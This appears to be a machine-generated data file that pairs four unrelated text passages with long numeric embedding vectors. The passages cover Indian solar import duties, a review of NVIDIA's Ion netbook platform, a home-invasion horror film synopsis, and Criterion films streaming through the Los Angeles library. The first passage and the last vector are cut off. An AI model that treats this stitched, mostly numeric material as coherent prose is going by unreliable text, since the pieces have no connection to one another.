the power. Then the solar sector will come down dramatically,” said Sunil Jain, CEO of Hero Future Energies, a renewable power producer with 500 MW of installed capacity. It is unclear whether the discoms have the appetite for expensive power, PwC’s Kumar added. As of Sept. 30, around 10,842 MW of solar projects were in the pipeline, according to BTI, and they could be jeopardised by the provisional duty or ADD. Even projects yet to be auctioned and assigned to power producers—around 2,655 MW as per BTI’s estimates—could be hit.
[ -0.11620272696018219, 0.0371558740735054, 0.060663413256406784, -0.017613673582673073, 0.053193364292383194, -0.03335823118686676, 0.0706816092133522, 0.0027116737328469753, -0.04998035728931427, 0.020859671756625175, 0.050992365926504135, 0.004430864937603474, 0.01717139594256878, 0.04508206620812416, 0.07088379561901093, 0.015241707675158978, 0.02594497799873352, -0.03442269563674927, -0.02434740588068962, 0.012546608224511147, 0.013848621398210526, -0.042786214500665665, 0.02908303029835224, -0.05720816180109978, 0.03944281488656998, 0.0009593020076863468, -0.10385576635599136, -0.054937347769737244, -0.014658638276159763, 0.04000585526227951, -0.08412974327802658, 0.12562668323516846, -0.07669639587402344, 0.011813477613031864, 0.035144951194524765, 0.041459280997514725, -0.08544030040502548, 0.01683536171913147, 0.034899577498435974, -0.04335607960820198, 0.053575482219457626, -0.09819529205560684, -0.023449731990695, -0.04606817662715912, -0.04525892063975334, -0.04609674587845802, 0.03416125476360321, -0.021008361130952835, 0.019254054874181747, -0.06299353390932083, 0.026059241965413094, 0.054942771792411804, -0.014081736095249653, 0.028612390160560608, 0.033328600227832794, -0.044171545654535294, 0.06272414326667786, -0.04579775407910347, 0.04775245860219002, 0.02553514391183853, 0.023279670625925064, -0.04959703981876373, -0.07979100197553635, -0.009750451892614365, 0.10476873070001602, -0.04022439941763878, 0.0012651096330955625, 0.042964328080415726, -0.0795016884803772, 0.0121539868414402, -0.018833456560969353, -0.01787189394235611, -0.048446234315633774, -0.03847963735461235, -0.07567819952964783, -0.015790598466992378, 0.10744844377040863, 0.03509741276502609, 0.01675560511648655, -0.05547783151268959, 0.049349214881658554, 0.06460369378328323, 0.03682902827858925, -0.003337313886731863, -0.022445645183324814, 0.004603725858032703, -0.0015197661705315113, 0.015536732040345669, 0.09475473314523697, -0.008044486865401268, -0.019812125712633133, 0.06382322311401367, 0.005787272471934557, 0.0624183714389801, 0.028299961239099503, 0.08577113598585129, 0.005854554940015078, -0.0022310675121843815, -0.039946313947439194, 0.010692816227674484, 0.10581319779157639, 0.0755225419998169, -0.09534230083227158, -0.05939426273107529, -0.07932568341493607, -0.08218695223331451, -0.0875466838479042, 0.023131420835852623, -0.0026908654253929853, 0.05929189175367355, 0.002969765802845359, 0.04861479625105858, -0.02652636170387268, -0.037337079644203186, 0.003275092225521803, 0.043629273772239685, 0.08159080147743225, -0.015078449621796608, -0.08591802418231964, -0.05832351744174957, -0.04380856826901436, 0.02519870735704899, 0.025133708491921425, -0.010832210071384907, -0.007152554113417864, 0.034749168902635574, -0.03635391592979431, 1.7376418306664143e-33, -0.03761403262615204, 0.017329582944512367, 0.04815595597028732, -0.09305240958929062, -0.09353826940059662, 0.08084767311811447, 0.013886827975511551, 0.07185660302639008, 0.03674420341849327, -0.06492874771356583, -0.08983375877141953, -0.023359496146440506, 0.01051798090338707, 0.042966652661561966, 0.08766982704401016, -0.07530120015144348, 0.037118881940841675, -0.07079765200614929, 0.09148076921701431, 0.01337684690952301, -0.028482917696237564, -0.01755119115114212, 0.05348118022084236, 0.007994658313691616, 0.009713209234178066, -0.052236881107091904, 0.04218125715851784, -0.025453906506299973, 0.022233201190829277, 0.026537887752056122, 0.06591510772705078, 0.00388211477547884, 0.019047824665904045, 0.012418325059115887, -0.06845462322235107, -0.028812197968363762, -0.077487513422966, 0.018676340579986572, -0.0436650775372982, -0.02376905083656311, -0.1141122579574585, 0.12283319979906082, -0.0342446006834507, 0.024886278435587883, -0.02252320572733879, 0.015215336345136166, 0.03976483643054962, -0.06036648154258728, -0.10359997302293777, 0.023777564987540245, -0.06637467443943024, 0.10313272476196289, -0.02887573093175888, -0.038351356983184814, -0.012474496848881245, 0.04371015727519989, 0.08729216456413269, -0.11895602196455002, 0.020510075613856316, 0.027110347524285316, -0.010869717225432396, -0.01790335401892662, -0.031393423676490784, 0.042306751012802124, -0.08219154924154282, 0.05334823206067085, 0.05161864310503006, -0.0036943512968719006, -0.07487087696790695, -0.04528480023145676, 0.01721125841140747, -0.07613794505596161, -0.04604051262140274, 0.0004051949072163552, 0.0379737913608551, 0.008756928145885468, -0.012266459874808788, 0.04902750626206398, -0.011935160495340824, -0.043609071522951126, -0.01688915677368641, -0.0042138914577662945, 0.05282725766301155, -0.09846285730600357, 0.026612257584929466, -0.07933665812015533, -0.0437714047729969, -0.009456307627260685, 0.054934460669755936, -0.028738219290971756, 0.051252707839012146, -0.014011768624186516, 0.009679527021944523, 0.016651850193738937, 0.0014691802207380533, -3.303666261558575e-33, 0.05135820433497429, 0.017804086208343506, -0.08480720967054367, -0.11766298860311508, 0.00998374167829752, -0.007315328810364008, -0.03239188343286514, -0.053598757833242416, 0.06116591393947601, 0.023426933214068413, -0.08257158100605011, 0.09171529859304428, 0.018191838636994362, 0.021884338930249214, 0.0005873437621630728, -0.05201434716582298, -0.03239954262971878, 0.08652570843696594, -0.03892282769083977, -0.02612762153148651, 0.05723953992128372, 0.08409478515386581, 0.00469982298091054, 0.07472070306539536, -0.10235217213630676, 0.016552086919546127, -0.09636195749044418, -0.016076648607850075, 0.03275430202484131, -0.015504584647715092, 0.03174819052219391, -0.0364968478679657, -0.05652884766459465, 0.05135267972946167, -0.006228230893611908, -0.015874743461608887, -0.03329060226678848, 0.01274862326681614, -0.03936313837766647, 0.03545653820037842, 0.014288332313299179, 0.017134252935647964, -0.045262180268764496, -0.004356804303824902, -0.05274001136422157, -0.09455056488513947, -0.0366007536649704, 0.028680454939603806, -0.0031473739072680473, -0.0068480828776955605, 0.03410644829273224, 0.032639846205711365, 0.008258847519755363, -0.024621840566396713, -0.01042662002146244, -0.03647032007575035, 0.05304240807890892, 0.06899076700210571, -0.06232061609625816, -0.029050536453723907, 0.061780061572790146, 0.026913626119494438, 0.046791598200798035, -0.0294968169182539, 0.014046503230929375, 0.02748602256178856, 0.1357792466878891, -0.022528033703565598, 0.1255541890859604, -0.07645662128925323, 0.023104554042220116, -0.050386447459459305, -0.09923078864812851, -0.0361882783472538, -0.0035466132685542107, 0.07459735870361328, -0.021573251113295555, 0.03859608620405197, 0.03542601317167282, 0.015723679214715958, 0.013027303852140903, 0.02483694814145565, 0.04743793606758118, -0.003832722781226039, -0.01605234667658806, -0.13024501502513885, 0.039749063551425934, -0.06914761662483215, 0.06127741187810898, 0.0487164668738842, -0.056169841438531876, 0.011207839474081993, -0.008953532204031944, 0.08983725309371948, 0.03835148736834526, -5.079546028241566e-8, -0.009179024957120419, -0.09229966253042221, 0.04234497994184494, 0.05375805124640465, -0.02985382452607155, -0.03396239131689072, 0.019726989790797234, 0.0919683501124382, 0.030538829043507576, 0.0140810776501894, 0.09847646951675415, -0.005611727014183998, 0.022484470158815384, -0.0031457901932299137, -0.13397249579429626, 0.007626873441040516, 0.04686989635229111, 0.11642395704984665, -0.036140866577625275, -0.01727440021932125, 0.03559629246592522, 0.019071755930781364, 0.02822139672935009, 0.0336361862719059, 0.03230177238583565, -0.015997257083654404, 0.021961389109492302, -0.012993586249649525, 0.004709205590188503, 0.02525273710489273, -0.03903619945049286, -0.010004740208387375, 0.04206793010234833, -0.028704926371574402, -0.025845883414149284, 0.05551998317241669, 0.009961205534636974, -0.05159774050116539, 0.040391214191913605, 0.03416389971971512, -0.06146352365612984, 0.001604336779564619, 0.02634359337389469, -0.011237619444727898, 0.002028638729825616, -0.02274700440466404, -0.054167333990335464, -0.04397672787308693, 0.04005860909819603, -0.026299184188246727, -0.00664113461971283, -0.006478544324636459, -0.002677322132512927, -0.022196264937520027, -0.0286262109875679, 0.048601895570755005, -0.1358664482831955, 0.05862097814679146, -0.018252858892083168, 0.05530200153589249, 0.048975054174661636, -0.08467317372560501, -0.014256241731345654, 0.055749550461769104 ]
I called it an ugly looking reference machine. So NVIDIA came back and painted it white. It worked for Apple after all, right? Perhaps eight years ago. As much as I can appreciate beauty, what truly matters here is what’s on the inside and that’s what NVIDIA gave me the opportunity to do over this past week. If you haven’t already seen it, what I’m talking about is NVIDIA’s Ion reference platform. In a nutshell it’s Intel’s Atom processor paired with NVIDIA’s GeForce 9400M chipset. I first brought you news of Ion in the middle of December 2008. It was delivered in the ugly box mentioned above. It seemed cool, it worked, but I only spent a few hours with it and wasn’t able to benchmark it. Our next encounter was at CES. NVIDIA called me up to its hotel room and offered the opportunity to benchmark an overly spec’d Ion box against a standard netbook boasting a much lighter config. That didn’t work out so well. This time NVIDIA shipped me a system, now in white. And I could do whatever I wanted with it. It doesn’t take a visionary to see why Ion would be great. Take a standard Atom system and give it a modern chipset with better graphics and you’ve got Ion. Performance goes up, everyone’s happy. Of course it’s nice to be able to quantify the performance advantage which is what I’ll be doing today, but for all intents and purposes we’ve known that Ion is a good thing. The Need for Ion Currently most Atom based desktops and notebooks use Intel’s 945G chipset. That’s the chipset before G45 and G35 - heck, even before G965 - released back in 2005. It features Intel’s GMA 950 graphics core, hardly high performance even by Intel’s standards. It’s a two chip solution built on a 130nm process and uses ICH7 for all south bridge/IO functions. The problem with 945G is that it’s old, it’s slow, and it takes up a lot of space. The aging 945G only supports DDR2-667 and generally only gets a single channel of memory on most netbooks/notebooks/desktops. The chipset’s performance isn’t terrible but it’s a bit bandwidth constrained. The combination of the Atom CPU, 945 GMCH, and ICH7 chips takes up quite a bit of motherboard real estate. While that’s acceptable on a desktop motherboard, it is a bit cramped in a netbook. Standard ATX motherboard (left) vs. Ion pico-ITX motherboard (right) Intel offers a more compact alternative in the form of the US15 chipset, but that doesn’t really address the graphics performance issue. The Ion motherboard NVIDIA’s Ion comes in as an alternative two-chip solution. The GeForce 9400M is a single chip, the other chip is the Atom, and the two make up Ion. You get a modern memory controller as well, supporting both DDR2 and DDR3 memory (up to DDR3-1066). Graphics performance is better than Intel and you get full HD video decode support. The Cost of Ion I point-blank asked NVIDIA what is required for an OEM to develop an Ion based system. NVIDIA responded by saying that the only thing necessary is that the OEM purchase a GeForce 9400M chipset; there are no required platforms or anything like that. The Ion reference PC is nothing more than a reference, and it doesn’t need to be followed. There are a few dozen Ion reference platforms out in the hands of OEMs and decision makers in the industry. NVIDIA expects Ion to add between $50 and $100 to the cost of a typical Atom machine. Availability is still slated for sometime in 2009, with some systems slated to arrive this summer. The Test Unlike the CES Ion comparison, I leveled the playing field. NVIDIA sent a fully configured Ion reference box with 2GB of DDR3-1066 and a dual-core Intel Atom 330 running at 1.6GHz. I purchased an Intel 945GCLF2 from Newegg for less than $60 (open box). This is a mini-ITX 945G motherboard with a single DDR2 slot and an on-board Atom 330. I installed a 2GB DIMM in the board and created a comparable machine to the Ion reference platform. I used an Intel X25-M SSD so you can compare the non-gaming numbers from this review to other CPUs in our benchmark database. In the gaming tests I used a GeForce 9300 motherboard and paired it up with a Celeron 430 to show what a faster CPU could get you with the same graphics used on an Ion platform. I tested with both single and dual channel DDR2-800 memory configurations here, and overclocked the 9300 to the 9400's GPU speeds.
[ -0.03499991074204445, 0.05259419232606888, 0.00579142477363348, 0.03194595128297806, 0.012564639560878277, -0.0432724729180336, -0.014192122034728527, 0.04191196337342262, -0.01228871289640665, -0.052734602242708206, -0.041786182671785355, -0.004050735384225845, 0.022139156237244606, -0.004716750234365463, -0.015694448724389076, -0.014301923103630543, 0.138419970870018, -0.06615480780601501, -0.015509537421166897, 0.024153083562850952, -0.011447705328464508, 0.03100655972957611, -0.017689894884824753, -0.03517511114478111, -0.011149048805236816, 0.09757953137159348, 0.023834187537431717, 0.008895691484212875, -0.0254196859896183, -0.08015439659357071, 0.002986449748277664, 0.07158159464597702, 0.004780143033713102, 0.019402964040637016, 0.04444272071123123, -0.04134558141231537, 0.04030737280845642, -0.008597645908594131, -0.037279870361089706, -0.07184319198131561, 0.0040093897841870785, 0.05137431621551514, 0.017631426453590393, 0.1337604522705078, -0.0026545030996203423, 0.016009032726287842, 0.08084903657436371, -0.08267570286989212, -0.009566038846969604, 0.00598690751940012, -0.034995272755622864, -0.054374899715185165, 0.024889102205634117, -0.042356934398412704, -0.027697954326868057, 0.09371589869260788, 0.006119350902736187, -0.07622725516557693, 0.04187287017703056, -0.02273687720298767, 0.08730990439653397, -0.08341629803180695, 0.011070451699197292, 0.0633317232131958, 0.03219452127814293, -0.017176343128085136, 0.024829020723700523, -0.08483925461769104, 0.04088650271296501, -0.05909506604075432, 0.07262934744358063, -0.03432238847017288, 0.0533447302877903, 0.027456801384687424, -0.04460936412215233, 0.020793424919247627, 0.02155051939189434, -0.07036220282316208, 0.06465980410575867, -0.02296997606754303, 0.013563118875026703, 0.01119451317936182, -0.0015909082721918821, 0.04540528357028961, 0.05410417169332504, 0.03779926896095276, 0.021703599020838737, -0.025552310049533844, 0.040543798357248306, -0.05967055633664131, 0.046215251088142395, 0.009719268418848515, 0.11460298299789429, -0.04838869348168373, 0.06046978011727333, -0.00022783520398661494, 0.030326377600431442, -0.022541023790836334, -0.05320167541503906, 0.09319259226322174, 0.05824977159500122, 0.07117415964603424, 0.046012669801712036, 0.040614016354084015, -0.01000354252755642, -0.026507597416639328, -0.03215249627828598, 0.11205881834030151, -0.061270132660865784, 0.07411385327577591, -0.0005395889165811241, -0.0037849843502044678, -0.06442014127969742, 0.0685882717370987, 0.05124703794717789, 0.01442298386245966, -0.01670697331428528, -0.031222524121403694, 0.0490284338593483, 0.02981054037809372, 0.002500237198546529, -0.027387293055653572, -0.08698886632919312, 0.01757088117301464, 0.026434151455760002, 0.11205088347196579, -0.022408131510019302, 1.4825748012303401e-33, 0.01232395600527525, 0.013572093099355698, -0.0009622098878026009, -0.04277133569121361, 0.038358379155397415, -0.019415080547332764, -0.013127284124493599, 0.08809205144643784, -0.024820441380143166, 0.06535571068525314, -0.00560049107298255, 0.03330780938267708, -0.015864379703998566, 0.07131371647119522, -0.013143020682036877, -0.059711914509534836, -0.10377632081508636, 0.027724063023924828, 0.0055865030735731125, 0.0914493277668953, 0.08203572034835815, 0.03827900066971779, 0.019740579649806023, -0.06821069866418839, -0.027971215546131134, 0.08612704277038574, -0.05488399788737297, -0.002894022036343813, 0.0513286218047142, -0.01342579536139965, 0.006750884000211954, -0.0038984313141554594, -0.004834459163248539, -0.04834957793354988, -0.06471133977174759, -0.01527872309088707, -0.04062100127339363, -0.07570794224739075, 0.007347656413912773, 0.04776335135102272, -0.06707951426506042, 0.10356897115707397, -0.0531073659658432, -0.05092025548219681, 0.053285419940948486, 0.0065879132598638535, -0.0481635220348835, -0.04054167866706848, -0.06889112293720245, 0.03252294287085533, -0.08167758584022522, 0.04000112786889076, 0.030591340735554695, 0.014504717662930489, -0.022669298574328423, 0.010692339390516281, 0.016490081325173378, 0.00789470225572586, 0.061122216284275055, 0.10054587572813034, 0.014314932748675346, -0.019609468057751656, -0.10700275003910065, 0.03858356550335884, -0.03179926425218582, 0.04769471660256386, -0.011894932948052883, 0.010502024553716183, -0.07333820313215256, 0.020528648048639297, 0.003553219838067889, -0.008101304993033409, -0.015353706665337086, -0.042642563581466675, 0.04332974553108215, -0.05268028378486633, -0.12240288406610489, 0.005160199943929911, -0.1005462110042572, -0.09323588758707047, 0.0062334234826266766, 0.029340634122490883, -0.006268154364079237, 0.03319036588072777, -0.018850574269890785, 0.016189349815249443, -0.054211344569921494, 0.007010390050709248, -0.04190116375684738, -0.05595027282834053, -0.04316331073641777, 0.05761542171239853, -0.03584574535489082, 0.023920387029647827, -0.03199398145079613, -1.9061322317964884e-33, 0.04238252714276314, -0.10147526860237122, -0.01989559829235077, 0.06405240297317505, 0.031843993812799454, -0.00031820544973015785, -0.08600157499313354, 0.004595960956066847, -0.023436572402715683, -0.0344628170132637, 0.058410003781318665, 0.06015394628047943, 0.06083536893129349, 0.008413488045334816, -0.05884423106908798, -0.02619038335978985, -0.043217968195676804, -0.04927251487970352, 0.005112735088914633, -0.05149034783244133, 0.06449589878320694, 0.03963492438197136, -0.013101146556437016, -0.09157121926546097, -0.0015086923958733678, 0.018973354250192642, 0.08745940029621124, -0.045700304210186005, 0.05692387372255325, -0.03234908729791641, -0.02048858255147934, -0.0023076049983501434, 0.04942458122968674, 0.007504973094910383, 0.07160335034132004, 0.027552753686904907, -0.00799358170479536, -0.018983131274580956, -0.02567867375910282, -0.026196984574198723, 0.05606677010655403, 0.06673701852560043, -0.013176540844142437, 0.004895561374723911, 0.06277083605527878, 0.08214665204286575, -0.0705389529466629, 0.034146614372730255, 0.134896382689476, -0.0940442904829979, -0.05636293813586235, -0.05380328372120857, -0.05171904340386391, 0.07321491092443466, -0.07479926198720932, -0.02617344819009304, 0.0368935652077198, 0.054896146059036255, 0.044607557356357574, 0.019451003521680832, -0.035175763070583344, 0.01637992076575756, -0.028322305530309677, -0.11182858794927597, 0.0014670059317722917, -0.04712887480854988, -0.0058091506361961365, 0.04352140054106712, 0.015732431784272194, -0.02978449873626232, -0.025795629248023033, -0.0257857833057642, -0.04080921411514282, -0.04257098212838173, -0.008385931141674519, 0.02521551214158535, 0.03331100940704346, -0.06995729357004166, -0.002801057416945696, 0.012520215474069118, 0.019422898069024086, -0.005463020876049995, 0.05280369520187378, 0.01870637573301792, 0.12424766272306442, 0.03761544078588486, 0.054892607033252716, -0.049859192222356796, -0.046940602362155914, 0.0067604826763272285, -0.06215517595410347, -0.07003173232078552, -0.025336401537060738, -0.00446269242092967, -0.1069021075963974, -5.22872092290072e-8, 0.05761495232582092, -0.0029204224701970816, 0.003988726530224085, 0.06779549270868301, 0.0016944173257797956, -0.028045453131198883, -0.02012920379638672, -0.033299896866083145, 0.054322972893714905, 0.027916057035326958, 0.01439707726240158, -0.07556474953889847, -0.06194392964243889, 0.07031834870576859, 0.02571205049753189, 0.05797262489795685, -0.018659314140677452, 0.04722294956445694, -0.010976118966937065, 0.004443593788892031, -0.11304325610399246, 0.010720144957304, 0.020845655351877213, -0.08483715355396271, -0.045602358877658844, 0.04161985591053963, 0.007924340665340424, 0.015748564153909683, 0.11103550344705582, -0.006769943982362747, -0.1409236490726471, 0.04753941297531128, 0.11852683871984482, -0.045555345714092255, -0.02053598128259182, -0.12897193431854248, -0.020761428400874138, 0.00130659865681082, 0.11330964416265488, -0.02552981860935688, -0.039338503032922745, -0.04279208555817604, -0.0625351071357727, -0.050151195377111435, 0.07417792081832886, -0.019032606855034828, -0.01642967201769352, -0.0823909118771553, -0.03772575408220291, 0.06259972602128983, 0.015261287800967693, -0.012042132206261158, -0.004249857738614082, 0.06703004240989685, 0.012246411293745041, -0.033712491393089294, -0.05202128365635872, -0.09515293687582016, -0.0009016182739287615, 0.060602735728025436, 0.1046372503042221, -0.07800468802452087, -0.01875971257686615, 0.021659763529896736 ]
Four months before Christmas, Sarah and Matthieu Scarangelo were in a car crash, of which Sarah and her unborn baby were the only survivors. On Christmas Eve, Sarah stays home alone, where she grieves her husband and prepares to go to the hospital the next morning for the delivery. As night falls, a woman knocks on Sarah's door asking to use the phone. When she refuses, the woman reveals that she knows Sarah and tries to force her way in. Sarah calls the police; they inspect the home and determine the woman has left, but promise to keep watch over Sarah through the night. The woman returns and tries to take Sarah's unborn child, but Sarah locks herself in the bathroom. The strange woman torments Sarah through the night and kills all who try help her. Written by EllenRipley112
[ -0.014193162322044373, 0.04485311359167099, 0.02716343104839325, 0.05028022080659866, -0.0083268191665411, 0.06423760205507278, 0.013745300471782684, 0.03590155392885208, 0.00718157272785902, 0.031401537358760834, -0.005967326462268829, 0.016468854621052742, -0.03121616691350937, 0.014417744241654873, -0.051849883049726486, -0.026984091848134995, -0.011124891228973866, 0.059211257845163345, -0.0012339880922809243, 0.11782833188772202, 0.08466056734323502, -0.07550547271966934, 0.062472302466630936, -0.013872694224119186, 0.019207531586289406, 0.0033063029404729605, -0.026323938742280006, -0.038294531404972076, -0.02650892175734043, 0.022682763636112213, -0.010426860302686691, 0.01703636348247528, 0.08671342581510544, -0.04225122928619385, 0.010238057002425194, 0.008633200079202652, 0.09748783707618713, 0.060175906866788864, 0.049449458718299866, 0.030539680272340775, -0.04356412589550018, 0.008213793858885765, 0.022086773067712784, -0.03327024355530739, -0.03622472286224365, -0.019363364204764366, 0.04745139554142952, -0.015282604843378067, 0.03361307829618454, -0.09971512109041214, -0.036139629781246185, 0.03841695189476013, -0.09383494406938553, 0.044798366725444794, -0.05619892477989197, 0.0087268752977252, 0.03562863916158676, -0.055029015988111496, -0.016569096595048904, 0.0009679818758741021, 0.0379965677857399, 0.03505774959921837, 0.0644356906414032, 0.027060026302933693, 0.08796507120132446, -0.0037316360976547003, -0.04377569630742073, 0.006587483920156956, 0.06383436918258667, 0.12067250162363052, 0.05955957993865013, 0.058747321367263794, 0.033474087715148926, 0.027788419276475906, -0.06158936023712158, 0.02865307219326496, 0.11662448197603226, -0.02881830744445324, 0.02982139401137829, 0.033551618456840515, -0.023211460560560226, -0.074993796646595, 0.055085960775613785, 0.03544316068291664, 0.028481289744377136, 0.05208562687039375, 0.05834091454744339, -0.02125445380806923, 0.022700699046254158, 0.06787904351949692, -0.04704073444008827, -0.0820125862956047, -0.01697193831205368, 0.03098822943866253, -0.003195270197466016, -0.03399060294032097, -0.01065770536661148, -0.04001791030168533, -0.04196397215127945, 0.03275547921657562, -0.031492676585912704, 0.04862913116812706, 0.06633752584457397, 0.021418767049908638, -0.01261316891759634, -0.008498236536979675, -0.061807021498680115, -0.09425511211156845, -0.009323426522314548, -0.05535151809453964, 0.02832956612110138, -0.06968404352664948, -0.06673596799373627, 0.04396411031484604, 0.006702234502881765, 0.006638501305133104, 0.038241155445575714, -0.03996974974870682, 0.02288779616355896, 0.0013323244638741016, 0.04726342484354973, 0.054844632744789124, -0.0016192516777664423, 0.019014837220311165, -0.020728755742311478, 0.02410627342760563, 0.07127030193805695, 3.3146259096700694e-33, -0.008351672440767288, -0.0337914414703846, 0.03708216920495033, -0.018084099516272545, 0.06002994626760483, 0.054800014942884445, -0.010182345286011696, 0.020834263414144516, 0.01607600599527359, 0.003296006005257368, -0.030612358823418617, -0.0992138460278511, -0.0146719329059124, -0.09365896135568619, -0.08431518077850342, 0.042127493768930435, 0.0063420855440199375, -0.05515244975686073, 0.03164047375321388, 0.03987277299165726, 0.04150531440973282, 0.027817051857709885, -0.02911330759525299, -0.009673754684627056, 0.013459065929055214, -0.05430988222360611, 0.09803777933120728, 0.10195788741111755, 0.033872999250888824, 0.00723851565271616, -0.07826749980449677, 0.03732794150710106, 0.09066259860992432, -0.05321922525763512, 0.03509693965315819, 0.03127239644527435, 0.029024530202150345, 0.033625680953264236, -0.012471072375774384, -0.03843224048614502, -0.1337735652923584, -0.07545477151870728, 0.023640580475330353, 0.004932805430144072, -0.053329434245824814, -0.08092440664768219, 0.01049838587641716, -0.06814603507518768, -0.011684217490255833, 0.13862158358097076, -0.00837387703359127, 0.050382595509290695, 0.0025471767876297235, 0.01441197283565998, -0.026845745742321014, 0.028377017006278038, 0.008763392455875874, -0.0953819677233696, -0.03911033645272255, -0.038991574198007584, 0.0776897445321083, -0.08294739574193954, 0.03428428992629051, -0.07973970472812653, -0.004525668919086456, -0.009106677025556564, 0.1218411922454834, -0.055346544831991196, -0.02940802462399006, -0.0055104647763073444, -0.09671927988529205, -0.00023520909599028528, 0.04849960654973984, -0.024278799071907997, -0.020538005977869034, 0.07793673872947693, 0.06187455728650093, -0.026008864864706993, 0.015268205665051937, -0.06616468727588654, 0.08097774535417557, -0.008240539580583572, 0.03433148190379143, 0.021117212250828743, -0.04821323603391647, -0.056464869529008865, 0.022551415488123894, 0.003049718914553523, -0.07771226018667221, 0.0606595017015934, 0.06355024129152298, 0.023512359708547592, 0.04098552465438843, 0.012804140336811543, -0.011427576653659344, -4.563389190721095e-33, 0.07651190459728241, -0.09675679355859756, -0.07460575550794601, 0.024039853364229202, -0.022135190665721893, -0.07975661009550095, -0.11287667602300644, 0.06221543624997139, 0.01852356269955635, 0.019281528890132904, -0.0038723021280020475, -0.13717195391654968, 0.05869539827108383, 0.023940909653902054, 0.028434980660676956, -0.06264837086200714, 0.050081487745046616, 0.04219796136021614, -0.04726800322532654, -0.0076108952052891254, 0.03895634412765503, 0.08199755847454071, -0.095231793820858, -0.04502537101507187, 0.0807601734995842, 0.017851002514362335, 0.12224242091178894, 0.05512944981455803, -0.09867259114980698, -0.09992709755897522, -0.0823056772351265, -0.07781081646680832, 0.01313031930476427, -0.0328519269824028, -0.01332266628742218, -0.0035655335523188114, -0.07051094621419907, -0.03838348016142845, 0.01140484120696783, -0.03455708920955658, 0.05837668851017952, 0.012247761711478233, -0.012370089069008827, 0.0824572816491127, 0.019490493461489677, 0.005801296327263117, 0.0033840248361229897, 0.12051893025636673, 0.14355583488941193, 0.053255222737789154, -0.0024334213230758905, -0.08629894256591797, -0.10412050038576126, 0.0034552549477666616, -0.015436132438480854, -0.042396459728479385, 0.004575471393764019, -0.03825746104121208, -0.04796649515628815, 0.017433365806937218, -0.021430376917123795, -0.03449978679418564, -0.024520553648471832, -0.039449866861104965, -0.03212602436542511, -0.08424779027700424, -0.056131262332201004, -0.04944855347275734, -0.0075015113689005375, 0.047973211854696274, 0.062342625111341476, -0.023838737979531288, -0.09607984125614166, 0.01690160110592842, 0.01731834188103676, -0.04069666191935539, -0.08499372750520706, -0.044241152703762054, -0.03417344018816948, -0.05928013473749161, 0.016305238008499146, -0.011294759809970856, 0.04865254461765289, 0.07006250321865082, 0.004925460554659367, -0.018875816836953163, 0.07398539036512375, 0.05064176023006439, -0.034536950290203094, 0.0022650582250207663, 0.03384670615196228, 0.03790009021759033, 0.049036480486392975, 0.029929695650935173, -0.001205160515382886, -5.742691300270053e-8, 0.07233377546072006, 0.036748431622982025, -0.08362884074449539, -0.06373997032642365, 0.005914171226322651, -0.02810252644121647, -0.003926644567400217, -0.0303239356726408, -0.04095553979277611, 0.010363828390836716, -0.014063563197851181, 0.03513416275382042, 0.008850603364408016, 0.02159346453845501, -0.041190262883901596, 0.0369022935628891, -0.02343740127980709, -0.0704079270362854, -0.009520592167973518, -0.08962155133485794, 0.02418074756860733, -0.04691532999277115, -0.009424966759979725, 0.0309698935598135, -0.012701090425252914, 0.04045083001255989, 0.004781636875122786, 0.03879169747233391, -0.012758252210915089, -0.011176219210028648, -0.037603460252285004, -0.018331540748476982, -0.0008223681361414492, -0.007587037049233913, -0.12781034409999847, -0.018282203003764153, -0.020663747563958168, -0.01453502755612135, -0.04210864380002022, 0.005966528318822384, 0.09507043659687042, -0.014270789921283722, 0.032613709568977356, -0.013524494133889675, -0.0680859237909317, -0.0880872905254364, 0.02554374933242798, -0.10630467534065247, -0.010464450344443321, 0.06278464198112488, -0.07503330707550049, -0.003564479062333703, -0.06110276281833649, 0.09689726680517197, 0.014282708056271076, 0.012327956967055798, -0.006810171063989401, -0.012423588894307613, -0.06936873495578766, 0.0956888422369957, -0.010096576064825058, -0.011181022971868515, 0.013837533071637154, -0.011265039443969727 ]
(See above for some of our picks from the available collection.) A Los Angeles Public Library card comes with plenty of perks, but did you know that it also provides access to hundreds of movies from the Criterion Collection? Criterion has dedicated itself to gathering and publishing the greatest films from around the world since 1984, and its collection is the ultimate cinephile playground. Your LAPL card will give you access to stream 419 (!) different films from Criterion's unparalleled collection, including the work of masters of cinema like Akira Kurosawa, Andrei Tarkovsky, Sergei Eisenstein and many others. Anyone with a Los Angeles Public Library card can stream the Criterion Collection - free - through Kanopy, which is in many schools too. https://t.co/kEHxPLfrdj — Manohla Dargis (@ManohlaDargis) July 13, 2017 Pull up a chair and stream French New Wave gems like Breathless, The 400 Blows, Jules and Jim, and Vivre Sa Vie, none of which are available for streaming on Netflix. Or delve into the classics of American independent film, and acquaint yourself with the work of Jim Jarmusch and John Cassavetes (also not available for streaming on Netflix). The possibilities are near infinite, or at least approximately 50,280* minutes long. The movies are made available to LAPL users through a service called Kanopy, and you can watch up to 10 films per month. Once you set up a free account on Kanopy using your library card, you can stream movies through your computer, or on your phone/iPad using the Kanopy app. Kanopy is also compatible with Apple TV and Roku. Anyone with a library card can set up a Kanopy here. The incredibleness of the collection is perhaps best summed up by a tweet by New York Times film critic Manohla Dargis, who responded to our query for favorites: What are your favorite movies in the Criterion Collection? — LAist (@LAist) July 13, 2017 Enjoy! *Four hundred and nineteen titles, multiplied by the average length of a movie (approximately 120 minutes).
[ -0.03128693625330925, -0.1320144683122635, -0.07863093912601471, -0.038690026849508286, 0.05954707786440849, 0.10298385471105576, -0.05648943781852722, 0.05493852123618126, 0.037141650915145874, -0.012879449874162674, -0.0022929799742996693, 0.010338013991713524, -0.02137853018939495, 0.032874394208192825, -0.014168174006044865, -0.001205695210956037, 0.1076965406537056, -0.02144729346036911, 0.05638084560632706, -0.05702752619981766, 0.032703228294849396, -0.0011696905130520463, 0.004173297435045242, -0.005291439592838287, 0.018112093210220337, -0.049788475036621094, -0.028156736865639687, -0.04013099893927574, -0.058633044362068176, -0.008161158300936222, 0.010999084450304508, 0.1070338562130928, -0.0737210065126419, -0.020127279683947563, 0.061792775988578796, -0.06369668245315552, 0.07523363828659058, -0.055005863308906555, -0.08955364674329758, 0.04588272422552109, -0.038325369358062744, 0.030694860965013504, -0.02156856097280979, 0.004037315491586924, 0.004720915108919144, -0.03567603603005409, -0.0047363699413836, -0.021974265575408936, -0.023803288117051125, 0.054849009960889816, -0.05897404998540878, 0.05103256180882454, 0.03512652963399887, 0.020611438900232315, -0.06054382771253586, -0.0908864438533783, -0.04792381450533867, -0.04039900749921799, 0.002348313806578517, -0.10723521560430527, -0.06862702965736389, -0.11271436512470245, -0.029976407065987587, -0.005590964574366808, 